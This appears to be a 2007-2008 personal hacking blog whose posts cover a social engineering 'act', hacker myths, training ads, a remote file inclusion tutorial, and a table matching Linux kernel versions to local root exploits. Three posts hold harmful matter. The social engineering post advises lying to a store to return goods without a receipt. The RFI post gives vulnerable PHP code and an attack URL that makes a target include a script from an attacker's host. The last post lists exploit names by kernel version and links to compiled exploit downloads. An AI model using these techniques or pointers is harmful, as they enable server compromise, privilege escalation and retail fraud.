Monday, April 7, 2008

Social Engineering The Act

I will be posting all my information on social engineering as i get it and write it. This thread may look crappy now but it will get alot better.

Section one:
Its all about your act. You must practise who you are and what you wil do. Wether you prefer to act like a reformed gentalmen when you are acting smooth with a lady to get her to tell you somethign or if you are a enraged customer it just matters. Some poeple use a double persona as in the act as two different people.


Section 2:
I cant stress it enough practise practise practise. You need to atleast practise what you will do and how you will act inside your head.

Section three:
Keywords are important so do research. Such as at target if you want to return something that you got from another store even you jsut say it was a gift you recieved and the recipt wasnt put in the bag by the employe. Now this plays on 2 things One Target has a policy for returnign items and 2 it was thier fualt.


/Chuks

Posted by chukjonia at 5:45 PM 0 comments

Saturday, March 15, 2008

OSCP


Hi guys

I got certified for C.E.H .last year and C.P.T.P. too. This March, I'm doing Offensive Security Certified Professional. I think this is the perfect course for anybody who want to be a pentester by profession. We are in Module 5, on arp spoofing and we are being shown some tactics with scripts like file2cable which proofs to be very effective in a switched network.

C.E.H. according to what i found out is more of script kiddles, where u get a tool and u just execute it.

O.S.C.P. is the course, good luck guys.

/Chuks

Posted by chukjonia at 3:46 PM 0 comments

Tuesday, March 4, 2008

Hacker Myths


All the perceptions of hackers and their portrayal in movies and entertainment have lead to the development of “hacker myths.” These myths involve common misconceptions about hackers and can lead to misconceptions about how to defend against them. Here we have attempted to identify some of these myths and dispel common misconceptions.

Hackers are a well-organized, malicious group.

There is indeed a community within the hacker underground. There are hacking-related groups such as Alt-2600 and Cult of the Dead Cow, IRC “hacking” channels, and related newsgroups. However, these groups are not formed into a well-organized group that targets specific networks for hacking. They share a common interest in methods for avoiding security defenses and accessing restricted information.

If you build it, they will come; and

It is safe if you hide in the tall grass.

Both of these myths represent opposing views on the probability of being hacked. Myth 2 is indicative of the view that once an Internet presence is established, malicious hackers will begin to attempt a compromise. Myth 3 expresses the opinion that there are so many Web sites around that if you just do not make a lot of noise and do not have one of the truly big sites, publicity-seeking hackers will not bother to go after you.
The truth lies somewhere in the middle. You will probably be scanned by users with malicious intent, but it may not happen the moment your systems go online. Some scans will be by groups trying to get an idea of how many Web sites are using a particular piece of software. Others are unethical (but legal) system reconnaissance.
A good plan is to develop a security posture that balances the risk of system compromise with the costs of implementing and maintaining security measures. This will allow you to sleep at night. While you may not stamp out the chance of compromise entirely, you will have done what you can to prevent and limit the compromise without killing your budget.

Security through obscurity.

Myth 4 implies that because you are small and unknown or you hide a vulnerability, you are not at risk. For example, according to this myth, if you create a Web site but give the URL only to your friends, you don't have to worry about it being attacked. Another example we have seen is the creation of a backdoor around a firewall by putting a second network card in a DMZ system and directly connecting it to the internal network. People using such a strategy think that because they have hidden the weakness, no one will find it and the organization is safe. However, security through obscurity does not work. Someone will find the weakness or stumble upon it and the systems will be compromised.

All hackers are the same.

This myth is borne out of a lack of knowledge among the general public about the hacker community. All hackers are not the same. As mentioned above, different hackers focus on different technologies and have different purposes and skill levels. Some hackers have malicious intent; some don't. They are not all teenagers who spend far too much time in front of a computer. Not all hackers are part of a group that defaces Web sites and creates and distributes hacking tools. The range among hackers is great, and you need to defend against them all.


/Chuks

Posted by chukjonia at 7:46 PM 0 comments

Wednesday, January 30, 2008

BUSY WITH TRAINING


Hi guys. I haven't been posting due to the fact i have been doing some training and alot of field work lately too.

New stuff is coming in too this coming Feb, so keep tuned.

If u wish to be in any of my trainings, you can contact me with the number posted in my profile. Training is as follows.

Assessing and Securing Wireless Networks

Few fields are as complex as wireless security. This course breaks down the issues and relevant standards that affect wireless network administrators, auditors, and information security professionals. With hands-on labs and instruction from industry wireless security experts, you will gain an intimate understanding of the risks threatening wireless networks. After identifying risks and attacks, we'll present field-proven techniques for mitigating these risks, leveraging powerful open-source and commercial tools for Linux and Windows systems.

Network Penetration Testing and Ethical Hacking



Find Security Flaws Before the Bad Guys Do

Security vulnerabilities such as weak configurations, unpatched systems, and botched architectures continue to plague organizations. Enterprises need people who can find these flaws in a professional manner to help eradicate them from our infrastructures. Lots of people claim to have penetration testing, ethical hacking, and security assessment skills, but precious few can apply these skills in a methodical regimen of professional testing to help make an organization more secure. This class covers the ingredients for successful network penetration testing to help attendees improve their enterprise's security stance.


Hacker Techniques, Exploits & Incident Handling

If your organization has an Internet connection and one or two disgruntled employees (and whose doesn't!), your computer systems will get attacked. From the five, ten, or even one hundred daily probes against your Internet infrastructure to the malicious insider slowly creeping through your most vital information assets, attackers are targeting your systems with increasing viciousness and stealth.

By helping you understand attackers' tactics and strategies in detail, giving you hands-on experience in finding vulnerabilities and discovering intrusions, and equipping you with a comprehensive incident handling plan, the in-depth information in this course helps you turn the tables on computer attackers. This course addresses the latest cutting-edge insidious attack vectors and the "oldie-but-goodie" attacks that are still so prevalent, and everything in between. Instead of merely teaching a few hack attack tricks, this course includes a time-tested, step-by-step process for responding to computer incidents; a detailed description of how attackers undermine systems so you can prepare, detect, and respond to them; and a hands-on workshop for discovering holes before the bad guys do. Additionally, the course explores the legal issues associated with responding to computer attacks, including employee monitoring, working with law enforcement, and handling evidence.

Advanced Web Application Penetration Testing



Assess Your Web Apps in Depth

Web applications are a major point of vulnerability in organizations today. Web app holes have resulted in the theft of millions of credit cards, major financial and reputational damage for hundreds of enterprises, and even the compromise of thousands of browsing machines that visited web sites altered by attackers. In this class, you'll learn the art of exploiting web applications so you can find flaws in your enterprise's web apps before the bad guys do. Through detailed, hands-on exercises and training from a seasoned professional, you will be taught the four-step process for web application penetration testing. You will inject SQL into back-end databases, learning how attackers exfiltrate sensitive data. You will utilize Cross Site Scripting attacks to dominate a target infrastructure in our unique hands-on laboratory environment. And, you will explore various other web app vulnerabilities in-depth, with tried-and-true techniques for finding them using a structured testing regimen. You will learn the tools and methods of the attacker, so that you can be a powerful defender.

OTHERS

Others like CEH Certified Ethical hacking and CPTP Certified Penetration Testing Professional, can be done as evening classes due to that they are very long and can't be finished in a weeks time.



Cheers,


/Chuks





Posted by chukjonia at 12:28 PM 0 comments

Wednesday, November 7, 2007

SOME BASIC REMOTE FILE INCLUSION

This also called RFI, its where the attacker tries to inject his own php code inside your php app. If an attacker is able to hit this then he could be able to execute any kind of code he wishes to on this webserver.

In a simple example, if the site is trying to do something like page=page.html to work out which page should be displayed, the code may look something like this:


$file =$_GET['page']; //The page we wish to display
include($file);
?>



If this vulnerability is experienced, this means the intruder can try to make the the code to try and run and pass down to the eg like this.

www.target.co.ke?page=www.h4x3r.co.ke/evil.txt?

So the vulnerable server will try to execute:


$file ="http://www.h4x3r.co.ke/evil.txt?"; //$_GET['page'];
include($file); //$file is the attackers script
?>



So the intruder has this executed. As u can see the attack script is having a .txt but we do put a question mark behind so as to be passed to the vulnerable website. Also we cant use a .php extension due to that we dont want the script to be executed on the attack machine.

This is the basic part on how to do it, u can google for more and advanced steps to undertake these attack, how to bypass restrictions and other ways like backconnecting and binding to the server remote shell interaction. Although this kind of attacks is dieing, u will still find it in alot of servers out there due to careless programming and luck of security audits on these servers. Also admins are to blame due to that they arent aware of how hacks are done and are new to these methods intruders use to pick gates, jump in and scroll in the server

Peace to all,

All the best

/Chuks

Posted by Chuks at 2:19 AM 2 comments

Tuesday, November 6, 2007

REMOTE CODE EXECUTION



This is where the intruder uses a vulnerability on your scripts to attack a webserver and executes arbitary commands. We can have a few snapshots of how it can be done. Check here.



Note that this is a very old bug and alot of servers are already patched against them but u will find a number of servers and sites still vulnerable to this.

Remote Code Execution also leads to others attacks, Like Local File Inclusions, Remote File Inclusions due to a method we call Gratuitous File Uploads.

Good week,

/Chuks

Posted by Chuks at 4:49 PM 2 comments

Tuesday, September 25, 2007

SOME LIST OF KERNEL LOCAL EXPLOITS

This is really useful. Tells you which exploits are suited to which kernels

2.4.17
newlocal
kmod


2.4.18
brk
brk2
newlocal
kmod
km.2


2.4.19
brk
brk2
newlocal
kmod
km.2


2.4.20
ptrace
kmod
ptrace-kmod
km.2
brk
brk2


2.4.21
km.2
brk
brk2
ptrace
ptrace-kmod


2.4.22
km.2
brk2
brk
ptrace
ptrace-kmod


2.4.22-10
loginx
./loginx


2.4.23
mremap_pte


2.4.24
mremap_pte
Uselib24


2.4.25-1
uselib24


2.4.27
Uselib24


2.6.0
REDHAT 6.2
REDHAT 6.2 (zoot)
SUSE 6.3
SUSE 6.4
REDHAT 6.2 (zoot)
all top from rpm
-------------------------
FreeBSD 3.4-STABLE from port
FreeBSD 3.4-STABLE from packages
freeBSD 3.4-RELEASE from port
freeBSD 4.0-RELEASE from packages
----------------------------
all with wuftpd 2.6.0;
=
wuftpd
h00lyshit


2.6.2
mremap_pte
krad
h00lyshit


2.6.5 to 2.6.10
krad
krad2
h00lyshit


2.6.8-5
krad2
./krad x
x = 1..9
h00lyshit


2.6.9-34
r00t
h00lyshit


2.6.13-17
prctl
h00lyshit

-------------------

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl


compiled and .c exploits can be found here: http://meto5757.by.ru/l0c4lr00t/

Posted by Chuks at 12:48 AM 0 comments
Subscribe to: Posts (Atom)